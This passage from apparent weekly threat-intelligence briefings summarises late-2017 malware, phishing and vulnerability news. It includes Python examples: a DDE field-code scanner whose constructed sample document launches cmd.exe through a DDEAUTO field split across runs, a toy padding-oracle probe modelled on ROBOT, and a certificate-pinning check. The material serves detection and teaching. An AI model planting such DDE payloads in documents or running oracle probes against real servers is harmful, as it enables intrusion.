WTB: macOS Exploit Published on the Last Day of 2017

The intelligence in this week’s iteration discusses the following threats: Data leak, Information stealing malware, Malspam, Misconfigured database, Phishing, RAT, Vulnerabilities, and Zero-day. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

macOS Exploit Published on the Last Day of 2017 (January 2, 2018)
A security researcher going by the alias “Siguza” has published details and exploit code for a zero-day vulnerability in the “IOHIDFamily” macOS kernel driver that has been present in the Mac operating system (macOS) since at least 2002. Siguza did not notify Apple before publishing. According to Siguza, the vulnerability is a Local Privilege Escalation (LPE) flaw: an actor can exploit it only with existing local access to the affected machine, for example through a prior malware infection, and it does not provide remote access on its own. An LPE is still serious because it turns any foothold, such as a malicious application or a phished user, into full kernel privileges.
Click here for Anomali recommendation

Resume-Themed Malspam Pushing Dreambot Banking Trojan (December 29, 2017)
Researchers have observed a new malspam campaign distributing the “Dreambot” banking trojan. The emails purport to send the recipient a resume for consideration and include a “Happy New Year” greeting to appear timely and legitimate. The “resume” attachment is a zip archive containing a .jse file (encoded JScript) that, if run, begins the Dreambot infection.
Click here for Anomali recommendation

Flaws in Sonos and Bose Smart Speakers Let Hackers Play Pranks on Users (December 27, 2017)
Trend Micro researcher Stephen Hill has discovered that some “Bose” and “Sonos” smart speakers are affected by vulnerabilities that could allow a threat actor to take over the device. The same weaknesses can be used by actors performing reconnaissance against a corporate network, or to gather information stored on the device for more convincing phishing attacks. Researchers report that the affected models are the “Sonos Play:1” and “Bose SoundTouch,” though other models may also be affected.
Click here for Anomali recommendation

Mozilla Releases Security Update for Thunderbird (December 25, 2017)
The United States Computer Emergency Readiness Team (US-CERT) has issued an alert regarding multiple vulnerabilities in Mozilla’s “Thunderbird” email client. Mozilla’s security advisory lists five vulnerabilities fixed in Thunderbird 52.5.2: two rated critical, two high, and one low. Some of them could allow remote code execution, so users running earlier versions should update.
Click here for Anomali recommendation

Vulnerability Affects Hundreds of Thousands of IoT Devices (December 25, 2017)
Researchers have discovered a vulnerability, registered as “CVE-2017-17562,” in the “GoAhead” embedded web server made by “Embedthis Software.” GoAhead ships in hundreds of thousands of IoT devices and in products from vendors such as Comcast, Oracle, and HP, among others. Elttam researchers identified a way to execute code remotely on devices running a vulnerable GoAhead build (versions prior to 3.6.5) with CGI support enabled; devices that cannot be updated should have CGI disabled or their management interface kept off untrusted networks.
Click here for Anomali recommendation

Malspam Uses CVE-2017-0199 To Distribute Remcos RAT (December 22, 2017)
Researchers have discovered that threat actors are exploiting the Microsoft Office/WordPad remote code execution vulnerability registered as “CVE-2017-0199” to distribute the “Remcos” Remote Access Trojan (RAT). The malspam emails claim that the attached invoice is incorrect and ask the recipient to amend it so that the sender, “Helen Rowe” of the “Purchasing Department,” can process the payment. The attachment is an RTF file which, if opened, prompts the user to update the document with data from linked files. Clicking yes, and then running the executable that is retrieved, infects the user with Remcos.
Click here for Anomali recommendation

Huawei Home Routers in Botnet Recruitment (December 21, 2017)
An updated variant of the “Mirai” distributed denial-of-service botnet malware, called “Satori,” is being used to exploit a zero-day vulnerability in “Huawei” home routers, according to Check Point researchers. The vulnerability is registered as “CVE-2017-17215.” The threat actor behind the campaign is believed to operate under the alias “Nexus Zeta.”
Click here for Anomali recommendation

Digmine Cryptocurrency Miner Spreading via Facebook Messenger (December 21, 2017)
Trend Micro researchers have discovered that threat actors are distributing cryptocurrency-mining malware, dubbed “Digmine,” via Facebook Messenger. The malware only affects the desktop/web-browser version of Messenger running in Chrome. Digmine installs an auto-start mechanism on infected machines, mines the “Monero” cryptocurrency, and then uses the victim’s Messenger account to send the malicious zip file to their “friends,” who become infected if they open it, growing the mining botnet.
Click here for Anomali recommendation

CVE-2017-11882 Exploited to Deliver a Cracked Version of the Loki Infostealer (December 20, 2017)
A new campaign has been found to be delivering a “cracked” version of the “Loki” information stealing malware, according to Trend Micro researchers. Threat actors are using a pirated version of Loki that is being distributed via spam emails that masquerade as an Australian shipping company with an attached receipt. The emails contain a malicious .docx file that then drops a Rich Text Format (RTF) file. The RTF file exploits the Microsoft Office vulnerability registered as “CVE-2017-11882” to download an HTML Application (HTA) dropper that then downloads the Loki payload.
Click here for Anomali recommendation

Home Economics: How Life in 123 Million American Households Was Exposed Online (December 20, 2017)
The UpGuard Cyber Risk Team has discovered that a cloud-based repository belonging to the California-based data analytics firm “Alteryx” was configured for public access. Specifically, the repository was an Amazon Web Services (AWS) S3 cloud storage bucket located on an Alteryx subdomain. The exposed data consists of Personally Identifiable Information (PII) such as financial history and mortgage ownership, in addition to 248 categories of specific data types within the AWS bucket.
Click here for Anomali recommendation

Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites (December 19, 2017)
Researchers have found that a “Captcha” plugin for WordPress, originally created by the developer “BestWebSoft,” was modified after being sold to a new owner. The buyer’s version of the plugin contained a backdoor, and because the plugin was installed on approximately 300,000 WordPress websites, all of them were exposed. An actor could use the backdoor to gain administrator privileges on an affected site.
Click here for Anomali recommendation

Cyberespionage Campaign Sphinx Goes Mobile With AnubisSpy (December 19, 2017)
Trend Micro researchers have discovered malicious applications that made their way into the Google Play store. The applications contain malware dubbed “AnubisSpy” and are believed to be linked to a cyber espionage campaign called “Sphinx,” which researchers attribute to the Advanced Persistent Threat group “APT-C-15.” AnubisSpy is capable of stealing various forms of data from an infected device as well as recording audio.
Click here for Anomali recommendation

TelegramRAT Evades Traditional Defenses via the Cloud (December 18, 2017)
The Remote Access Trojan (RAT) called “TelegramRAT” is being distributed via a malicious Microsoft Office document, according to Netskope Threat Research Labs. The document exploits the Microsoft Office vulnerability registered as “CVE-2017-11882” and uses a “Bit.ly” shortened URL to hide the download location of the RAT, which is hosted on Dropbox. TelegramRAT uses the messaging service Telegram’s Bot API to send and receive commands, so its command-and-control traffic blends in with legitimate traffic to Telegram. The RAT is capable of numerous malicious functions, including stealing various forms of data and deleting evidence of its presence.
Click here for Anomali recommendation

CHM Badness Delivers a Banking Trojan (December 18, 2017)
SpiderLabs researchers have discovered a malspam campaign that is targeting Brazilian institutions with the “Bancos” banking trojan. The threat actors behind this campaign are distributing the trojan via malspam emails that utilize Compiled HTML (CHM) file attachments. This tactic allows actors to conceal malicious downloader code in files and make them more difficult to detect. If the CHM is opened and subsequently decompressed by its default application, “Microsoft Help Viewer”, the HTML objects will run a JavaScript function that begins the Bancos infection process.
Click here for Anomali recommendation

Source: Honeypot Tech

12 Days of Threats

On the first day of Christmas a hacker stole from me,
Thousands in my favorite cryptocurrency…
On the second day of Christmas a hacker stole from me,
Two plain-text passwords and thousands in my favorite cryptocurrency…

We’re sure by now you’ve heard too much Christmas music, so we’ll spare you a full rendition. However, as we approach the end of the year, we’d like to reflect on some of the year’s most notable cyber events.

Freedom Hosting II

Threat description: February 2017 – A first-time hacker acting under the Anonymous banner took down approximately 20% of all Dark Web traffic this year by breaching Freedom Hosting II (FH2), a Dark Web hosting provider. A message posted on all of the affected sites explained that FH2 was targeted because it provided services to child pornography and scam sites. The attacker initially offered to ransom the Freedom Hosting II database for 0.1 Bitcoin (a little over $100 at the time), but later released it publicly. The dump included plain-text emails and passwords, site user lists, personal information about site administrators, and a write-up of how the systems were breached.

Holiday gift: Bad guys get empty stockings and empty sites


Threat description: February 17th, 2017 – Internet infrastructure and security company Cloudflare was not the target of a malicious attack, but likely felt its share of panic this year. A bug in Cloudflare’s reverse proxies (widely called “Cloudbleed”) leaked data belonging to some Cloudflare customers into responses served to others. That Personally Identifiable Information (PII) was then picked up by search-engine crawlers and by users during everyday browsing. The leaked data included full HTTPS requests and responses, client IP addresses, cookies, and passwords. Tavis Ormandy of Google Project Zero, who first identified the issue, was able to get Cloudflare servers to return private messages from dating sites, full messages from chat services, online hotel bookings, and password manager data. Cloudflare has since published its analysis of the bug’s potential impact.

Holiday gift: Proof that collaboration can identify and fix issues before a malicious actor takes advantage

Wikileaks CIA Vault 7

Threat description: March 7th, 2017 – This year Wikileaks released thousands of pages describing CIA software tools and techniques, some allegedly created in collaboration with British intelligence. The trove, titled Vault 7, serves as a catalogue of advanced tactics for surveillance and cyber operations, including how to compromise smartphones, computers, and Internet-connected TVs. The CIA has not confirmed the authenticity of the documents, but officials speaking anonymously have indicated that the Vault 7 material is genuine. Wikileaks has not identified its source. The existence of such documents is not surprising, but the scope of the tools and procedures is. The documents also cover techniques for compromising Skype, Wi-Fi networks, PDF documents, commercial antivirus programs, and the phones running messaging apps such as WhatsApp, Signal, and Telegram (by capturing messages on the device, not by breaking the apps’ encryption).

Holiday gift: The CIA is there to listen when we have a long day. Now we can be a good friend and hear a bit about theirs as well.

Shadow Brokers

Threat description: The Shadow Brokers first came to public attention with an announcement on Pastebin.com offering tools stolen from the NSA’s hacking division, officially called Tailored Access Operations and known in the security industry as the Equation Group. Few buyers took the bait, so The Shadow Brokers began publicly releasing the material, entirely unredacted. The exploits released are older and in many cases already patched, but still have significant potential for damage: the NSA backdoor used by the WannaCry ransomware, DOUBLEPULSAR, came from one of the Shadow Brokers’ leaks. It is still unknown exactly who the Shadow Brokers are.

Holiday gift: Catalogues more interesting than SkyMall.


Threat description: May 12th, 2017 – The WannaCry ransomware outbreak serves as evidence that weapons-grade cyber attacks developed by nation states are now being used for profit. WannaCry was one of the first examples of ransomware that had the ability to spread to other (Windows) computers on its own, similar to malware of the past like Conficker. The ransomware was able to spread on its own by scanning for systems vulnerable to MS17-010, exploiting them, and then using a recently leaked NSA backdoor to install the ransomware on the system. Both the exploit, called ETERNALBLUE, and the backdoor, DOUBLEPULSAR, came from the recent “Lost in Translation” dump leaked by the Shadow Brokers. The United States government has officially blamed North Korea for WannaCry.

Holiday gift: Some tissue for those impacted by WannaCry.


Threat description: June 27th, 2017 – The NotPetya malware rapidly spread across Europe and North America and infected tens of thousands of systems in more than 65 countries. It is built on the Petya ransomware, which was first advertised by Janus Cybercrime Solutions as a Ransomware-as-a-Service (RaaS) in late 2015. The initial infection vector is believed to be a trojanised software update from the Ukrainian financial software company MeDoc. Anton Geraschenko, an aide to the Ukrainian Interior Minister, stated that the infection was “the biggest in Ukraine’s history.” Estimated damages reached into the hundreds of millions for companies such as the French construction group Saint-Gobain, which lost an estimated $387 million.

Holiday gift: Nothing. Ransomware still sucks 🙁

Hackers Target Nuclear Facilities

Threat description: July 2017 – Critical infrastructure such as nuclear and energy facilities is frequently targeted by advanced persistent threat actors. This year the Department of Homeland Security and the Federal Bureau of Investigation released a joint report indicating that companies including the Wolf Creek Nuclear Operating Corporation had been targeted. The attack methods included targeted emails with malicious Word documents, man-in-the-middle attacks (redirecting traffic through attacker-controlled machines), and watering hole attacks (compromising legitimate websites the targets visit). Evidence points to the Russian group “Energetic Bear.” The intrusions appear to have been limited to business networks; no damage to operational systems was reported.

Holiday gift: Energy sector > energetic adversaries


Threat description: July 2017 – The Ethereum platform and applications built on it suffered multiple thefts in 2017. On separate occasions criminals stole more than $1 million, $7.4 million, and later $32 million worth of “ether,” the second most widely used cryptocurrency. In the last case, white-hat hackers exploited the same vulnerability to drain about $75 million worth of ether from other vulnerable wallets before the thieves could, in order to return it to its owners. Ethereum’s problems did not end there: later in the year a flaw in Parity’s multi-signature wallet contract left roughly $300 million frozen. Parity Technologies suggested a fork (think hard reset) to “unlock” the funds, like the one enacted after the DAO hack.

Holiday gift: We’ve identified a better solution than Nutcrackers for a tough nut to crack – white hat hackers.


Threat description: September 2017 – More than 27,000 MongoDB databases exposed to the Internet were wiped and held for ransom. The targeted instances were running with default settings, requiring no authentication, which made them easy for attackers to find and empty. Unfortunately, many of the companies that paid the ransom never got their data back. Without proper management of permissions and settings, services like MongoDB present an easy opportunity for attackers.

Holiday gift: Security best practices from MongoDB, and a reminder of their importance. This holiday season try to look at security not as the often-ignored fruitcake, but as the delicious frosting keeping your internet gingerbread house together.

Campaign Hacks

Threat description: 2017 – After the direct foreign influence in the 2016 U.S. presidential election, many were left wondering if the numerous European elections of 2017 would encounter the same challenges. In the Netherlands’ March election, concerns over security were so great that every vote was counted by hand. Interior Minister Ronald Plasterk directly cited Russia as a factor in this decision, along with insecure and outdated counting software. The Macron campaign of France, knowing that a targeted attack was inevitable, engaged in a “cyber-blurring” strategy. Fake email accounts were seeded with false documents to slow down hackers. The French government cyber security agency ANSSI later confirmed attacks on the Macron campaign, but did not officially name Russia as the culprit. The German election did not encounter any direct interference, but they did have a bit of a scare – IT specialists Thorsten Schröder, Linus Neumann and Martin Tschirsich analyzed German voting count software and found numerous security flaws. Overall, it appears that most of the elections were carried out relatively unscathed.

Holiday gift: Putin snuck his way onto the nice list last year and got a bald eagle as an early Christmas gift. This year the EU got him for Secret Santa and gave him nada.

Equifax Data Breach

Threat description: September 7th, 2017 – Equifax announced a major breach of its systems, exposing data on approximately 143 million Americans, 400,000 Britons, and 100,000 Canadians. The exposed data contained a host of Personally Identifiable Information (PII), including addresses, dates of birth (DOB), full names, dispute documents, and of course Social Security Numbers (SSNs). The exploited vulnerability, “CVE-2017-5638” in the Apache Struts web framework, had been patched in March 2017, but Equifax had not applied the fix. With information on roughly half the population of the United States now exposed, many are questioning the viability of the Social Security Number as an identifier. Affected people should stay alert for fraud.

Holiday gift: Free credit report monitoring from the same company that lost your information in the first place


Threat description: October 24th, 2017 – Yet another large ransomware campaign, Bad Rabbit, targeted entities in Russia and Eastern Europe, predominantly news and media organisations. The initial infection vector was believed to be drive-by downloads from compromised Russian websites serving a fake Adobe Flash Player installer. Once inside a network, the ransomware propagated via Server Message Block (SMB). Bad Rabbit bears similarities to the WannaCry and NotPetya outbreaks earlier in the year.

Holiday gift: A reminder of the movie Donnie Darko. That’s about it.

Source: Honeypot Tech

Security Worries? Let Policies Automate the Right Thing

By programming ‘good’ cybersecurity practices, organizations can override bad behavior, reduce risk, and improve the bottom line.
Source: Cyber Monitoring

Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence

CTI falls into three main categories — tactical, operational, and strategic — and answers questions related to the “who, what, and why” of a cyber attack.
Source: Cyber Monitoring

WTB: New GnatSpy Mobile Malware Family Discovered

This section contains summaries of threat intelligence stories from the past week. The intelligence in this week’s iteration discusses the following threats: ATM theft, Data leak, Malspam, Mobile malware, Phishing, Targeted attacks, Threat group, Underground markets, and Vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

Jack of All Trades (December 18, 2017)
A new mobile malware family, called “Loapi,” is targeting Android devices, according to Kaspersky Lab researchers. It has been called a “jack of all trades” because of its many capabilities: its modular architecture lets it display advertisements, take part in Distributed Denial-of-Service (DDoS) attacks, mine cryptocurrency, send SMS messages, and subscribe victims to paid services, among other actions. Researchers note that the modular design would let the operators add new features at any time. The malware was observed impersonating antivirus and adult-content applications.
Click here for Anomali Recommendation

New GnatSpy Mobile Malware Family Discovered (December 18, 2017)
In early 2017, researchers discovered that a threat group, dubbed “Two-tailed Scorpion/APT-C-23,” was targeting Middle Eastern organizations with the “Vamp” malware and, later, “FrozenCell.” Trend Micro researchers have now discovered a new mobile malware family, dubbed “GnatSpy,” believed to be a new variant of Vamp. As of this writing, researchers do not know how the group distributes the malware to Android devices; because few applications were found to contain GnatSpy, it is possible that the actors send it directly to targeted devices rather than through app stores. The complexity of GnatSpy indicates that the group is investing more engineering effort in stealing information from Android devices.
Click here for Anomali Recommendation

Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks (December 15, 2017)
Microsoft has released an Office update that disables the Dynamic Data Exchange (DDE) protocol in Word as part of December’s Patch Tuesday (Microsoft security advisory ADV170021). DDE lets one Office application load data from another, and field codes that invoke it have been used by threat actors to launch malware from documents without macros. The update turns DDE off in Word by default; administrators who need the feature can re-enable it through a registry setting documented in the advisory, at the cost of reopening that attack path.
Click here for Anomali Recommendation
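As an added example (not Microsoft’s code and not part of the Anomali briefing), the Python script below shows how the DDE field codes that the update disables can be found in a .docx before it reaches a user. A .docx is a zip of XML parts; Word stores field codes in w:instrText runs or in w:fldSimple attributes, and malicious documents split “DDEAUTO” across several runs to defeat naive string matching, so the scanner joins the runs of each field before matching. The sample document is constructed in memory (just enough of a .docx for the scanner, not a file Word would open); the regular expressions and the part names scanned are the scanner’s own assumptions about Word’s XML rather than a full schema walk.

```python
"""Scan a .docx for DDE / DDEAUTO field codes.

Added example, not Microsoft's or Anomali's code. The sample .docx is
constructed in memory so the script runs offline.
"""
import html
import io
import re
import zipfile

# Word keeps field codes either as <w:instrText> runs between a fldChar
# "begin"/"end" pair, or as a <w:fldSimple w:instr="..."> attribute.
# Malicious documents split "DDEAUTO" across runs, so the runs that belong
# to one field are joined before matching. (Assumed XML shapes.)
INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*\sw:instr="([^"]*)"')
BEGIN_RE = re.compile(r'<w:fldChar[^>]*\sw:fldCharType="begin"')
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)


def field_codes(xml):
    """Return every field code in one XML part, runs of a field joined."""
    codes = []
    for chunk in BEGIN_RE.split(xml):          # one chunk per field
        joined = "".join(INSTR_RE.findall(chunk))
        if joined:
            codes.append(joined)
    codes.extend(SIMPLE_RE.findall(xml))
    return [html.unescape(c) for c in codes]


def scan_docx(data):
    """Return (part name, field code) for every field that invokes DDE."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            # document body, headers, footers, footnotes, comments all live here
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = z.read(name).decode("utf-8", "replace")
            for code in field_codes(xml):
                if DDE_RE.search(re.sub(r"\s+", " ", code)):
                    hits.append((name, code.strip()))
    return hits


def build_sample_docx(instr_runs):
    """Constructed minimal .docx: one paragraph holding one field whose code
    is spread over the given instrText runs. Enough for the scanner only."""
    runs = "".join(
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        % html.escape(t) for t in instr_runs)
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/'
        'wordprocessingml/2006/main"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>lorem</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed samples: a DDEAUTO field split across three runs, the way
# malspam documents do it, and a benign DATE field.
MALICIOUS_DOCX = build_sample_docx(
    [" DDE", "AUTO", ' "C:\\\\Windows\\\\System32\\\\cmd.exe" "/c calc.exe" '])
BENIGN_DOCX = build_sample_docx([' DATE \\@ "d MMMM yyyy" '])

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, scan_docx(doc))
```

On a mail gateway the same function would run over every attachment with a Word content type; a hit is worth quarantining even after the update, since older Office installs and other Office applications still honour DDE fields.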

Ngay Campaign Rig EK Pushes Quant Loader & Monero CPU Miner (December 14, 2017)
Nao-sec researchers discovered a drive-by download campaign, dubbed “ngay,” that appears to target Vietnamese-speaking users. The actors behind it previously redirected website visitors to the “Disdain” Exploit Kit (EK). Researchers identified that the campaign now uses the “RIG” EK to distribute the “Quant” loader and a “Monero” cryptocurrency miner.
Click here for Anomali Recommendation

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure (December 14, 2017)
While responding to a security incident, FireEye Mandiant researchers discovered that an unnamed company had been infected with an attack framework called “TRITON.” The malware is designed to interact with Triconex Safety Instrumented System (SIS) controllers. Researchers state that TRITON is one of only a handful of publicly identified malware families built to target Industrial Control Systems (ICS), following “Stuxnet” and “Industroyer.” It was found on a Windows SIS engineering workstation, disguised as the legitimate Triconex Trilog application.
Click here for Anomali Recommendation

Apple Releases Security Updates (December 13, 2017)
The U.S. Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities in multiple Apple products. Some could be exploited by a remote threat actor to alter application state on iOS and tvOS. In iCloud for Windows 7.2, an actor in a privileged network position could track a user on the same network.
Click here for Anomali Recommendation

WORK Cryptomix Ransomware Variant Released (December 13, 2017)
A new variant of the “Cryptomix” ransomware, dubbed “WORK” because it appends the .WORK extension to encrypted files, has been discovered in the wild, according to BleepingComputer researchers. The variant uses the same encryption methods as previous Cryptomix versions; the changes are the new extension and new contact email addresses for obtaining the decryption key. The distribution method has not been reported, but malspam is the most common delivery method for this family.
Click here for Anomali Recommendation

The ROBOT Attack (December 12, 2017)
A vulnerability class first identified in 1998 by researcher Daniel Bleichenbacher has resurfaced as “Return Of Bleichenbacher’s Oracle Threat” (ROBOT), according to researchers Hanno Böck and Craig Young. Bleichenbacher’s attack is the original padding oracle attack: he found that “the error messages given by SSL server for errors in the PKCS #1 1.5 padding allowed an adaptive-chosen ciphertext attack; this attack fully breaks the confidentiality of TLS when used with RSA encryption.” Any observable difference in how a server treats malformed RSA-encrypted premaster secrets (distinct alerts, timing, connection resets) hands an attacker the oracle. Against a vulnerable host, an actor who has recorded traffic can later decrypt sessions that used RSA key exchange (which has no forward secrecy), and can also use the oracle in real time to sign arbitrary data with the server’s private key. Researchers found that 27 of the top 100 domains, ranked by Alexa, had vulnerable subdomains. Beyond vendor patches, the practical mitigation is to disable RSA encryption cipher suites (TLS_RSA_*) in favour of (EC)DHE key exchange.
Click here for Anomali Recommendation
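The Python script below is an added illustration (not the ROBOT researchers’ tool and not Anomali content) of what the oracle is. It uses a constructed toy RSA key, a server that branches on PKCS #1 v1.5 padding errors the way vulnerable TLS stacks did, a second server that applies the RFC 5246 countermeasure of silently substituting a random premaster secret, and a ROBOT-style probe that sends deliberately malformed ciphertexts and checks whether the responses differ. The key size, message length and response strings are the example’s own assumptions; it needs Python 3.8+ for the modular inverse via pow().

```python
"""Toy PKCS#1 v1.5 padding oracle (Bleichenbacher / ROBOT).

Added example, not the researchers' code. The RSA key is a constructed toy
key and is NOT secure; it only lets the script run offline in milliseconds.
"""
import os

# Two Mersenne primes give a ~150-bit modulus; gcd(E, phi) = 1 holds here.
P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8          # modulus length in bytes (19)
PMS_LEN = 8                            # toy "premaster secret" length


def pkcs1_v15_pad(msg):
    """EM = 00 || 02 || PS (>= 8 random nonzero bytes) || 00 || M."""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    ps = bytes(b % 255 + 1 for b in os.urandom(ps_len))   # never 0x00
    return b"\x00\x02" + ps + b"\x00" + msg


def encrypt_block(em):
    return pow(int.from_bytes(em, "big"), E, N)


def encrypt(msg):
    return encrypt_block(pkcs1_v15_pad(msg))


def decrypt_block(c):
    return pow(c, D, N).to_bytes(K, "big")


def vulnerable_server(c):
    """Branches on the padding and reports why it failed. Each distinct
    response (alert type, timing or a TCP reset on real servers) is the oracle."""
    em = decrypt_block(c)
    if em[:2] != b"\x00\x02":
        return "alert:bad_block_type"
    sep = em.find(b"\x00", 2)
    if sep < 0:
        return "alert:no_separator"
    if sep < 10:                               # fewer than 8 padding bytes
        return "alert:short_padding"
    if len(em) - sep - 1 != PMS_LEN:
        return "alert:bad_length"
    return "continue"


def hardened_server(c):
    """RFC 5246 section 7.4.7.1 countermeasure: never signal a padding error.
    On any failure use a random premaster secret and carry on; the handshake
    then fails at Finished exactly as a wrong key would, so every malformed
    ciphertext looks the same from outside. Real code must also keep the
    timing branch-free, which Python cannot promise."""
    em = decrypt_block(c)
    sep = em.find(b"\x00", 2)
    well_formed = (em[:2] == b"\x00\x02" and sep >= 10
                   and len(em) - sep - 1 == PMS_LEN)
    pms = em[sep + 1:] if well_formed else os.urandom(PMS_LEN)
    _ = pms                                    # key derivation would use pms
    return "continue"


def robot_probe(server):
    """ROBOT-style check: send ciphertexts with deliberately broken padding
    and compare the responses. Any difference means the server is an oracle.
    The probe only needs the public key, exactly like a real attacker."""
    pad = b"\x11" * (K - 3 - PMS_LEN)
    pms = b"A" * PMS_LEN
    vectors = [
        b"\x00\x02" + pad + b"\x00" + pms,                 # well formed
        b"\x01\x17" + pad + b"\x00" + pms,                 # wrong block type
        b"\x00\x02" + b"\x11" * (K - 2),                   # no 00 separator
        b"\x00\x02\x11\x11\x00" + b"\x11" * (K - 5),       # separator too early
    ]
    responses = {server(encrypt_block(v)) for v in vectors}
    return len(responses) > 1


if __name__ == "__main__":
    for name, srv in (("vulnerable", vulnerable_server),
                      ("hardened", hardened_server)):
        print(name, "ORACLE" if robot_probe(srv) else "no oracle")
```

Against a real server the probe’s ciphertexts travel inside a TLS ClientKeyExchange and the “responses” are the alert type, timing and connection behaviour that follow, but the test is the same: a server that is indistinguishable across all four vectors gives the attacker nothing to work with, while one that differs can be driven by Bleichenbacher’s algorithm, one well-formed/not-well-formed answer at a time, to decrypt a recorded premaster secret or to sign with the server’s key.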

Database of 1.4 Billion Credentials Found on Dark Web (December 11, 2017)
4iQ researchers have discovered a large, searchable database that aggregates compromised credentials from approximately 252 previous breaches. The discovery was made on December 5, 2017. The advertised total is 1,400,533,869 usernames with associated clear-text passwords. The database is packaged so that anyone can download and query it, and its search returns results in about one second. On further analysis, researchers found that the number of usable credentials is lower because not every username has an associated password. While some sources state that the data was found on underground forums, which is likely, it was also found in open locations such as “Reddit.”
Click here for Anomali Recommendation

Hacker’s Delight: Mobile Bank App Security Flaw Could Have Smacked Millions (December 11, 2017)
University of Birmingham researchers have published details of vulnerabilities in popular banking applications. Using a custom tool called “Spinner,” they ran semi-automated security tests on 400 security-sensitive applications. Many of the banking apps use “certificate pinning” to strengthen connection security, and pinning is also what had hidden the more serious flaw from standard penetration-testing tools: the apps pinned the certificate authority but did not verify that the server’s hostname matched the certificate presented. Any certificate issued by the pinned CA for any domain would therefore be accepted, allowing a threat actor on the same network as the user to conduct Man-in-The-Middle (MiTM) attacks and steal credentials.
Click here for Anomali Recommendation
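As an added example (not the researchers’ Spinner tool and not any bank’s code), the Python below shows the difference between the flawed check and the correct one. Certificates are modelled as small dicts holding the DER SubjectPublicKeyInfo bytes and the DNS names from the leaf’s subjectAltName; the key bytes, names and chains are constructed. Standard chain validation (signatures, expiry, trust store) is assumed to have been done by the platform TLS stack before either function runs; pinning is an extra check on top of that, never a replacement for it.

```python
"""Certificate pinning with and without hostname verification.

Added example; not code from the Spinner research or any banking app.
Certificates are stand-in dicts: "spki" holds what would be the DER
SubjectPublicKeyInfo, "san_dns" the leaf's subjectAltName DNS entries.
"""
import base64
import hashlib


def spki_pin(spki_der):
    """HPKP-style pin: base64(SHA-256(SubjectPublicKeyInfo))."""
    digest = hashlib.sha256(spki_der).digest()
    return "sha256/" + base64.b64encode(digest).decode()


def hostname_matches(pattern, host):
    """RFC 6125-style matching: case-insensitive, wildcard only as the whole
    left-most label, never across a dot, never on a single-label suffix."""
    pattern = pattern.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if pattern == host:
        return True
    if not pattern.startswith("*."):
        return False
    suffix = pattern[2:]
    if suffix.count(".") < 1:              # refuse "*.com"
        return False
    first, _, rest = host.partition(".")
    return bool(first) and rest == suffix


def pin_matches(chain, pins):
    """True if any certificate in the presented chain carries a pinned key."""
    return any(spki_pin(cert["spki"]) in pins for cert in chain)


def verify_pin_only(chain, pins, host):
    """The flawed pattern: pin to the CA, never look at the leaf's name.
    Any certificate that CA issued, for any domain, is accepted."""
    return pin_matches(chain, pins)


def verify_pin_and_hostname(chain, pins, host):
    """Corrected: hostname check on the leaf, then the pin check. Both run
    after the platform's ordinary chain validation (assumed done)."""
    leaf = chain[0]
    if not any(hostname_matches(name, host) for name in leaf["san_dns"]):
        return False
    return pin_matches(chain, pins)


# Constructed chains. The attacker's certificate is a perfectly valid one for
# the attacker's own domain, issued by the same CA the app pins.
CA = {"spki": b"constructed-ca-key", "san_dns": []}
BANK_CHAIN = [
    {"spki": b"constructed-bank-key",
     "san_dns": ["www.bank.example", "*.bank.example"]},
    CA,
]
ATTACKER_CHAIN = [
    {"spki": b"constructed-attacker-key", "san_dns": ["evil.example"]},
    CA,
]
PINS = {spki_pin(CA["spki"])}


def demo(host="api.bank.example"):
    return {
        "pin_only_accepts_attacker": verify_pin_only(ATTACKER_CHAIN, PINS, host),
        "fixed_rejects_attacker": not verify_pin_and_hostname(ATTACKER_CHAIN, PINS, host),
        "fixed_accepts_bank": verify_pin_and_hostname(BANK_CHAIN, PINS, host),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(check, result)
```

Pinning the leaf key instead of the CA key would also have closed this hole, but it makes certificate rotation painful; the robust shape is to keep the platform’s hostname verification switched on and add the pin as a second gate, which is exactly the order the corrected function follows.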

Phishing Attacks on Bitcoin Wallets Intensify as Price Goes Higher and Higher (December 11, 2017)
With the significant increase in the value of Bitcoin, approximately $16,180 USD per bitcoin as of this writing, threat actors are increasingly targeting Bitcoin-related websites and Bitcoin users. In addition to phishing emails, “CheckPhish” researchers identified five phishing domains impersonating the “Blockchain” wallet service, and other security researchers found the “LocalBitcoins” exchange brand used on phishing websites. The actors aim to steal wallet files and credentials and empty the accounts of their bitcoins.
Click here for Anomali Recommendation

Hackers Hit U.S., Russian Banks In ATM Robbery Scam: Report (December 11, 2017)
